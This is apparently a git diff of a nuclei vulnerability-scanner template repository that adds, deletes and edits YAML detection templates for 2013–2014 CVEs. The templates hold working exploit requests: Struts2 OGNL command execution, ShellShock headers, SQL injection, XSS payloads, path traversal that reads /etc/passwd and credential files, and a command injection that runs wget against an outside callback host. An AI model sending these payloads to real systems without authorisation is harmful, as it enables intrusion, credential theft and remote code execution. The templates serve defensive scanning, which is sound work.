/login.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1 + Host: {{Hostname}} + Accept: */* + + - | + GET /index.action?{{params}}%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1 + Host: {{Hostname}} + Accept: */* + + payloads: + params: + - "redirect" + - "action" + - "redirectAction" + + matchers-condition: and + matchers: + - type: status + condition: or + status: + - 200 + - 400 + + - type: regex + part: body + regex: + - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)" diff --git a/nuclei-templates/CVE-2013/cve-2013-3526.yaml b/nuclei-templates/CVE-2013/cve-2013-3526.yaml new file mode 100644 index 0000000000..a65162e1be --- /dev/null +++ b/nuclei-templates/CVE-2013/cve-2013-3526.yaml @@ -0,0 +1,30 @@ +id: CVE-2013-3526 + +info: + name: WordPress Plugin Traffic Analyzer - 'aoid' Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2013-3526 + tags: cve,cve2013,wordpress,xss,wp-plugin + description: "Cross-site scripting (XSS) vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter." + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2013/cve-2013-7091.yaml b/nuclei-templates/CVE-2013/cve-2013-7091.yaml deleted file mode 100644 index 191f655001..0000000000 --- a/nuclei-templates/CVE-2013/cve-2013-7091.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2013-7091 - -info: - name: Zimbra Collaboration Server 7.2.2/8.0.2 LFI - author: rubina119 - severity: critical - description: Directory traversal vulnerability in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz in Zimbra 7.2.2 and 8.0.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the skin parameter. This can be leveraged to execute arbitrary code by obtaining LDAP credentials and accessing the service/admin/soap API. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2013-7091 - - https://www.exploit-db.com/exploits/30085 - - https://www.exploit-db.com/exploits/30472 - tags: cve,cve2013,zimbra,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00" - - "{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00" - - stop-at-first-match: true - matchers-condition: or - matchers: - - type: word - words: - - "zimbra_server_hostname" - - "zimbra_ldap_userdn" - - "zimbra_ldap_password" - - "ldap_postfix_password" - - "ldap_amavis_password" - - "ldap_nginx_password" - - "mysql_root_password" - condition: or - - - type: regex - regex: - - "root=.*:0:0" \ No newline at end of file diff --git a/nuclei-templates/CVE-2013/cve-2013-7240.yaml b/nuclei-templates/CVE-2013/cve-2013-7240.yaml new file mode 100644 index 0000000000..2b8df419a9 --- /dev/null +++ b/nuclei-templates/CVE-2013/cve-2013-7240.yaml @@ -0,0 +1,36 @@ +id: CVE-2013-7240 + +info: + name: WordPress Plugin Advanced Dewplayer 1.2 - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter. + reference: + - https://www.exploit-db.com/exploits/38936 + - https://nvd.nist.gov/vuln/detail/CVE-2013-7240 + tags: cve,cve2013,wordpress,wp-plugin,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2013-7240 + cwe-id: CWE-22 + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php' + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + - "DB_HOST" + - "The base configurations of the WordPress" + part: body + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2014/CVE-2014-10037.yaml b/nuclei-templates/CVE-2014/CVE-2014-10037.yaml deleted file mode 100644 index 35aa39b4b4..0000000000 --- a/nuclei-templates/CVE-2014/CVE-2014-10037.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2014-10037 - -info: - name: DomPHP 0.83 - Directory Traversal - author: daffainfo - severity: high - description: A directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impacts via a .. (dot dot) in the url parameter to photoalbum/index.php. - reference: - - https://www.exploit-db.com/exploits/30865 - - https://www.cvedetails.com/cve/CVE-2014-10037 - - https://nvd.nist.gov/vuln/detail/CVE-2014-10037 - - http://osvdb.org/show/osvdb/102204 - classification: - cve-id: CVE-2014-10037 - tags: cve,cve2014,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/24 diff --git a/nuclei-templates/CVE-2014/CVE-2014-2321.yaml b/nuclei-templates/CVE-2014/CVE-2014-2321.yaml deleted file mode 100644 index 7f328db084..0000000000 --- a/nuclei-templates/CVE-2014/CVE-2014-2321.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2014-2321 - -info: - name: ZTE Cable Modem Web Shell - author: geeknik - severity: high - description: | - ZTE F460 and F660 cable modems allows remote attackers to obtain administrative access via sendcmd requests to web_shell_cmd.gch, as demonstrated by using "set TelnetCfg" commands to enable a TELNET service with specified credentials. - reference: - - https://yosmelvin.wordpress.com/2017/09/21/f660-modem-hack/ - - https://jalalsela.com/zxhn-h108n-router-web-shell-secrets/ - - https://nvd.nist.gov/vuln/detail/CVE-2014-2321 - - http://www.kb.cert.org/vuls/id/600724 - classification: - cve-id: CVE-2014-2321 - tags: iot,cve,cve2014,zte - -requests: - - method: GET - path: - - "{{BaseURL}}/web_shell_cmd.gch" - - matchers-condition: and - matchers: - - type: word - words: - - "please input shell command" - - "ZTE Corporation. All rights reserved" - part: body - condition: and - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/04/01 diff --git a/nuclei-templates/CVE-2014/CVE-2014-2323.yaml b/nuclei-templates/CVE-2014/CVE-2014-2323.yaml new file mode 100644 index 0000000000..c813730817 --- /dev/null +++ b/nuclei-templates/CVE-2014/CVE-2014-2323.yaml @@ -0,0 +1,32 @@ +id: CVE-2014-2323 + +info: + name: Lighttpd 1.4.34 SQL Injection and Path Traversal + author: geeknik + severity: critical + description: A SQL injection vulnerability in mod_mysql_vhost.c in lighttpd before 1.4.35 allows remote attackers to execute arbitrary SQL commands via the host name (related to request_check_hostname). + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2014-2323 + - https://download.lighttpd.net/lighttpd/security/lighttpd_sa_2014_01.txt + - http://www.lighttpd.net/2014/3/12/1.4.35/ + - http://seclists.org/oss-sec/2014/q1/561 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2014-2323 + cwe-id: CWE-89 + tags: cve,cve2014,sqli,lighttpd,injection + +requests: + - raw: + - |+ + GET /etc/passwd HTTP/1.1 + Host: [::1]' UNION SELECT '/ + + unsafe: true + matchers: + - type: regex + regex: + - "root:[x*]:0:0:" + +# Enhanced by mp on 2022/02/24 diff --git a/nuclei-templates/CVE-2014/CVE-2014-2383.yaml b/nuclei-templates/CVE-2014/CVE-2014-2383.yaml new file mode 100644 index 0000000000..bb404d9069 --- /dev/null +++ b/nuclei-templates/CVE-2014/CVE-2014-2383.yaml @@ -0,0 +1,42 @@ +id: CVE-2014-2383 + +info: + name: Arbitrary file read in dompdf < v0.6.0 + author: 0x_Akoko + severity: high + description: A vulnerability in dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2014-2383 + - https://www.exploit-db.com/exploits/33004 + - http://seclists.org/fulldisclosure/2014/Apr/258 + - https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2383/ + classification: + cve-id: CVE-2014-2383 + metadata: + unix-payload: /dompdf.php?input_file=/etc/passwd + win-payload: /dompdf.php?input_file=C:/windows/win.ini + tags: cve,cve2014,dompdf,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/dompdf.php?input_file=dompdf.php" + - "{{BaseURL}}/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=dompdf.php" + - "{{BaseURL}}/lib/dompdf/dompdf.php?input_file=dompdf.php" + - "{{BaseURL}}/includes/dompdf/dompdf.php?input_file=dompdf.php" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - "application/pdf" + - 'filename="dompdf_out.pdf"' + part: header + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/24 diff --git a/nuclei-templates/CVE-2014/CVE-2014-2962.yaml b/nuclei-templates/CVE-2014/CVE-2014-2962.yaml new file mode 100644 index 0000000000..2c2c67d121 --- /dev/null +++ b/nuclei-templates/CVE-2014/CVE-2014-2962.yaml @@ -0,0 +1,34 @@ +id: CVE-2014-2962 + +info: + name: Belkin N150 Router 1.00.08/1.00.09 - Path Traversal + author: daffainfo + severity: high + description: A path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter. + reference: + - https://www.kb.cert.org/vuls/id/774788 + - https://nvd.nist.gov/vuln/detail/CVE-2014-2962l + - http://www.kb.cert.org/vuls/id/774788 + - http://www.belkin.com/us/support-article?articleNum=109400 + remediation: Ensure that appropriate firewall rules are in place to restrict access to port 80/tcp from external untrusted sources. + classification: + cve-id: CVE-2014-2962 + tags: cve,cve2014,lfi,router,firmware,traversal + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/23 diff --git a/nuclei-templates/CVE-2014/CVE-2014-3206.yaml b/nuclei-templates/CVE-2014/CVE-2014-3206.yaml deleted file mode 100644 index 93e697d674..0000000000 --- a/nuclei-templates/CVE-2014/CVE-2014-3206.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2014-3206 - -info: - name: Seagate BlackArmor NAS - Command Injection - author: gy741 - severity: critical - description: Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2014-3206 - - https://www.exploit-db.com/exploits/33159 - - https://www.exploit-db.com/exploits/33159/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2014-3206 - cwe-id: CWE-20 - tags: cve,cve2014,seagate,rce - -requests: - - raw: - - | - GET /backupmgt/localJob.php?session=fail;wget http://{{interactsh-url}}; HTTP/1.1 - Host: {{Hostname}} - Accept: */* - - - | - GET /backupmgt/pre_connect_check.php?auth_name=fail;wget http://{{interactsh-url}}; HTTP/1.1 - Host: {{Hostname}} - Accept: */* - - unsafe: true - matchers: - - type: word - part: interactsh_protocol - words: - - "http" - -# Enhanced by mp on 2022/02/24 diff --git a/nuclei-templates/CVE-2014/CVE-2014-3704.yaml b/nuclei-templates/CVE-2014/CVE-2014-3704.yaml index 8fc7a922aa..883f72ee3c 100644 --- a/nuclei-templates/CVE-2014/CVE-2014-3704.yaml +++ b/nuclei-templates/CVE-2014/CVE-2014-3704.yaml @@ -1,21 +1,15 @@ id: CVE-2014-3704 - info: - name: Drupal SQL Injection + name: Drupal Sql Injetion author: princechaddha severity: high - description: The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing specially crafted keys. + description: The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing crafted keys. reference: - - https://www.drupal.org/forum/newsletters/security-advisories-for-drupal-core/2014-10-15/sa-core-2014-005-drupal-core-sql - - https://nvd.nist.gov/vuln/detail/CVE-2014-3704 - https://www.drupal.org/SA-CORE-2014-005 - - https://www.exploit-db.com/exploits/34984 - - https://www.exploit-db.com/exploits/34992 - - https://www.exploit-db.com/exploits/34993 - - https://www.exploit-db.com/exploits/35150 - remediation: Upgrade to Drupal core 7.32 or later. - classification: - cve-id: CVE-2014-3704 + - http://www.exploit-db.com/exploits/34984 + - http://www.exploit-db.com/exploits/34992 + - http://www.exploit-db.com/exploits/34993 + - http://www.exploit-db.com/exploits/35150 tags: cve,cve2014,drupal,sqli requests: @@ -36,5 +30,3 @@ requests: - "e807f1fcf82d132f9bb018ca6738a19f" condition: and part: body - -# Enhanced by mp on 2022/02/24 diff --git a/nuclei-templates/CVE-2014/CVE-2014-4535.yaml b/nuclei-templates/CVE-2014/CVE-2014-4535.yaml new file mode 100644 index 0000000000..23d27ce4bf --- /dev/null +++ b/nuclei-templates/CVE-2014/CVE-2014-4535.yaml @@ -0,0 +1,40 @@ +id: CVE-2014-4535 + +info: + name: Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting + author: daffainfo + severity: medium + description: A cross-site scripting vulnerability in the Import Legacy Media plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php. + reference: + - https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd + - https://nvd.nist.gov/vuln/detail/CVE-2014-4535 + - http://codevigilant.com/disclosure/wp-plugin-import-legacy-media-a3-cross-site-scripting-xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2014-4535 + cwe-id: CWE-79 + tags: cve,cve2014,wordpress,wp-plugin,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "'>" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/24 diff --git a/nuclei-templates/CVE-2014/CVE-2014-4536.yaml b/nuclei-templates/CVE-2014/CVE-2014-4536.yaml new file mode 100644 index 0000000000..b2485663df --- /dev/null +++ b/nuclei-templates/CVE-2014/CVE-2014-4536.yaml @@ -0,0 +1,41 @@ +id: CVE-2014-4536 + +info: + name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected Cross-Site Scripting + author: daffainfo + severity: medium + description: Multiple cross-site scripting vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter. + reference: + - https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f + - https://nvd.nist.gov/vuln/detail/CVE-2014-4536 + - http://wordpress.org/plugins/infusionsoft/changelog + - http://codevigilant.com/disclosure/wp-plugin-infusionsoft-a3-cross-site-scripting-xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2014-4536 + cwe-id: CWE-79 + tags: cve,cve2014,wordpress,wp-plugin,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&" + + matchers-condition: and + matchers: + - type: word + words: + - '">' + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/24 diff --git a/nuclei-templates/CVE-2014/CVE-2014-4550.yaml b/nuclei-templates/CVE-2014/CVE-2014-4550.yaml new file mode 100644 index 0000000000..481cf4dd1d --- /dev/null +++ b/nuclei-templates/CVE-2014/CVE-2014-4550.yaml @@ -0,0 +1,40 @@ +id: CVE-2014-4550 + +info: + name: Shortcode Ninja <= 1.4 - Unauthenticated Reflected Cross-Site Scripting + author: daffainfo + severity: medium + description: A cross-site scripting vulnerability in preview-shortcode-external.php in the Shortcode Ninja plugin 1.4 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the shortcode parameter. + reference: + - https://wpscan.com/vulnerability/c7c24c7d-5341-43a6-abea-4a50fce9aab0 + - https://nvd.nist.gov/vuln/detail/CVE-2014-4550 + - http://codevigilant.com/disclosure/wp-plugin-shortcode-ninja-a3-cross-site-scripting-xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2014-4550 + cwe-id: CWE-79 + tags: cve,cve2014,wordpress,wp-plugin,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/shortcode-ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e" + + matchers-condition: and + matchers: + - type: word + words: + - "'>" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/24 diff --git a/nuclei-templates/CVE-2014/CVE-2014-4592.yaml b/nuclei-templates/CVE-2014/CVE-2014-4592.yaml deleted file mode 100644 index c2521e5d30..0000000000 --- a/nuclei-templates/CVE-2014/CVE-2014-4592.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2014-4592 - -info: - name: WP Planet <= 0.1 - Unauthenticated Reflected Cross-Site Scripting - author: daffainfo - severity: medium - description: A cross-site scripting vulnerability in rss.class/scripts/magpie_debug.php in the WP-Planet plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the url parameter. - reference: - - https://wpscan.com/vulnerability/3c9a3a97-8157-4976-8148-587d923e1fb3 - - https://nvd.nist.gov/vuln/detail/CVE-2014-4592 - - http://codevigilant.com/disclosure/wp-plugin-wp-planet-a3-cross-site-scripting-xss - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2014-4592 - cwe-id: CWE-79 - tags: cve,cve2014,wordpress,wp-plugin,xss - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/24 diff --git a/nuclei-templates/CVE-2014/CVE-2014-5111.yaml b/nuclei-templates/CVE-2014/CVE-2014-5111.yaml index f8a4d0004a..36a72b9429 100644 --- a/nuclei-templates/CVE-2014/CVE-2014-5111.yaml +++ b/nuclei-templates/CVE-2014/CVE-2014-5111.yaml @@ -5,12 +5,9 @@ info: author: daffainfo severity: high description: Multiple directory traversal vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter to (1) home/index.php, (2) asterisk_info/asterisk_info.php, (3) repo/repo.php, or (4) endpointcfg/endpointcfg.php in maint/modules/. - reference: + reference: | - https://www.exploit-db.com/exploits/39351 - - https://nvd.nist.gov/vuln/detail/CVE-2014-5111 - - http://packetstormsecurity.com/files/127522/Trixbox-XSS-LFI-SQL-Injection-Code-Execution.html - classification: - cve-id: CVE-2014-5111 + - https://www.cvedetails.com/cve/CVE-2014-5111 tags: cve,cve2014,lfi,trixbox requests: @@ -23,10 +20,8 @@ requests: - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" - type: status status: - 200 - -# Enhanced by mp on 2022/02/24 diff --git a/nuclei-templates/CVE-2014/CVE-2014-5258.yaml b/nuclei-templates/CVE-2014/CVE-2014-5258.yaml index 78a3979930..70144e35a4 100644 --- a/nuclei-templates/CVE-2014/CVE-2014-5258.yaml +++ b/nuclei-templates/CVE-2014/CVE-2014-5258.yaml @@ -4,14 +4,10 @@ info: name: webEdition 6.3.8.0 - Directory Traversal author: daffainfo severity: high - description: A directory traversal vulnerability in showTempFile.php in webEdition CMS before 6.3.9.0 Beta allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter. + description: Directory traversal vulnerability in showTempFile.php in webEdition CMS before 6.3.9.0 Beta allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2014-5258 - https://www.exploit-db.com/exploits/34761 - - http://packetstormsecurity.com/files/128301/webEdition-6.3.8.0-Path-Traversal.html - - http://www.webedition.org/de/webedition-cms/versionshistorie/webedition-6/version-6.3.9.0 - classification: - cve-id: CVE-2014-5258 + - https://www.cvedetails.com/cve/CVE-2014-5258 tags: cve,cve2014,lfi requests: @@ -24,10 +20,8 @@ requests: - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" - type: status status: - - 200 - -# Enhanced by mp on 2022/02/25 + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2014/cve-2014-5368.yaml b/nuclei-templates/CVE-2014/CVE-2014-5368.yaml similarity index 100% rename from nuclei-templates/CVE-2014/cve-2014-5368.yaml rename to nuclei-templates/CVE-2014/CVE-2014-5368.yaml diff --git a/nuclei-templates/CVE-2014/CVE-2014-6271.yaml b/nuclei-templates/CVE-2014/CVE-2014-6271.yaml new file mode 100644 index 0000000000..66122b3290 --- /dev/null +++ b/nuclei-templates/CVE-2014/CVE-2014-6271.yaml @@ -0,0 +1,49 @@ +id: CVE-2014-6271 + +info: + name: ShellShock - Remote Code Execution + author: pentest_swissky,0xelkomy + severity: critical + description: GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka ShellShock. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2014-6271 + - https://nvd.nist.gov/vuln/detail/CVE-2014-7169 + - http://www.kb.cert.org/vuls/id/252743 + - http://www.us-cert.gov/ncas/alerts/TA14-268A + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2014-6271 + cwe-id: CWE-78 + tags: cve,cve2014,rce,shellshock + +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/cgi-bin/status" + - "{{BaseURL}}/cgi-bin/stats" + - "{{BaseURL}}/cgi-bin/test" + - "{{BaseURL}}/cgi-bin/status/status.cgi" + - "{{BaseURL}}/test.cgi" + - "{{BaseURL}}/debug.cgi" + - "{{BaseURL}}/cgi-bin/test-cgi" + + headers: + Shellshock: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd " + Referer: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd " + Cookie: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd " + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: regex + part: body + regex: + - "root:.*:0:0:" + +# Enhanced by mp on 2022/02/25 diff --git a/nuclei-templates/CVE-2014/cve-2014-6308.yaml b/nuclei-templates/CVE-2014/CVE-2014-6308.yaml similarity index 100% rename from nuclei-templates/CVE-2014/cve-2014-6308.yaml rename to nuclei-templates/CVE-2014/CVE-2014-6308.yaml diff --git a/nuclei-templates/CVE-2014/CVE-2014-8682.yaml b/nuclei-templates/CVE-2014/CVE-2014-8682.yaml deleted file mode 100644 index 79f240dc79..0000000000 --- a/nuclei-templates/CVE-2014/CVE-2014-8682.yaml +++ /dev/null @@ -1,43 +0,0 @@ -id: CVE-2014-8682 - -info: - name: Gogs (Go Git Service) - SQL Injection - author: dhiyaneshDK,daffainfo - severity: high - description: Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2014-8682 - - http://seclists.org/fulldisclosure/2014/Nov/33 - - http://packetstormsecurity.com/files/129117/Gogs-Repository-Search-SQL-Injection.html - - https://github.com/gogits/gogs/commit/0c5ba4573aecc9eaed669e9431a70a5d9f184b8d - - https://www.exploit-db.com/exploits/35238 - - https://exchange.xforce.ibmcloud.com/vulnerabilities/98694 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10 - cve-id: CVE-2014-8682 - cwe-id: CWE-89 - metadata: - shodan-query: title:"Sign In - Gogs" - tags: cve,cve2014,sqli,gogs - -requests: - - method: GET - path: - - '{{BaseURL}}/api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '"ok":true' - - '"data"' - - '"repolink":"' - condition: and - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/04/26 diff --git a/nuclei-templates/CVE-2014/cve-2014-9094.yaml b/nuclei-templates/CVE-2014/CVE-2014-9094.yaml similarity index 100% rename from nuclei-templates/CVE-2014/cve-2014-9094.yaml rename to nuclei-templates/CVE-2014/CVE-2014-9094.yaml diff --git a/nuclei-templates/CVE-2014/cve-2014-9606.yaml b/nuclei-templates/CVE-2014/CVE-2014-9606.yaml similarity index 100% rename from nuclei-templates/CVE-2014/cve-2014-9606.yaml rename to nuclei-templates/CVE-2014/CVE-2014-9606.yaml diff --git a/nuclei-templates/CVE-2014/CVE-2014-9607.yaml b/nuclei-templates/CVE-2014/CVE-2014-9607.yaml new file mode 